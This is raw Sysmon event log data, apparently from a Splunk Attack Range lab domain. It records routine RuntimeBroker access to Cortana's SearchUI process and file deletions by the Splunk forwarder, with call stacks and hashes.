08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053741Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.647{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053740Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.632{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053739Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.632{466BC892-32D3-60E8-6F0B-00000000CF01}70763308C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 23542300x80000000000000001053738Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:35.230{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=74A59189D89629A0EE1659F4027792B4,SHA256=63EC71BE4B6DF1B045EDD4D8EFA9601CC7E067F534ABB00989DB700E522CD200,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810015Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:36.839{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=745E6C55503A9B9E6235904669D22D17,SHA256=A3066B392CA2606A43ACA84A25CB1DF5FC8AE8407C0DB546B4B2DF57BA1DECBD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053766Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:36.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=24A241B20B2D179E219A82528A6495F0,SHA256=F4EA25498A178608A280E0792961155EFFDFEDA478874B8D28B55D35CF6CD899,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053765Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:36.878{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=77A5CEE91F4AFA9075D84874E4AA4E89,SHA256=45F733FE3BDB128BBB98AE4E594CF833C4C67AFFA3D86010120E00A851936CCA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001053764Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:36.379{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2B3E5D39F7FB84626630B7C407BE24D,SHA256=FDC79B63321F09079EB0652C648E4A47D21024E9769BFD9C1EE24D0E74E9DD5F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000810017Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:37.855{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8296B7E3BB75282C6B9D5D59501D2913,SHA256=851572574A6E161B509CDB9707013884DBE36C0AA53E494E08F8DD89390C9C2C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053826Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.926{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+6e886|C:\Windows\System32\windows.storage.dll+701e8|C:\Windows\system32\windows.cortana.Desktop.dll+f6ca|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001053825Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.926{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+d3034|C:\Windows\System32\windows.storage.dll+d072b|C:\Windows\system32\windows.cortana.Desktop.dll+f61e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4 10341000x80000000000000001053824Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.875{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053823Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.875{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053822Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.875{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053821Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.875{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053820Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.875{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053819Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.875{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053818Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.859{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 23542300x80000000000000001053817Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.859{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D141B75E01640041A4E048E94AABC75B,SHA256=5C94BA5EC324778BBE3BB79356961F734C741214AE7DE02EF92813B48A21A479,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001053816Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.843{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053815Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.843{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053814Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.843{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053813Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.843{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 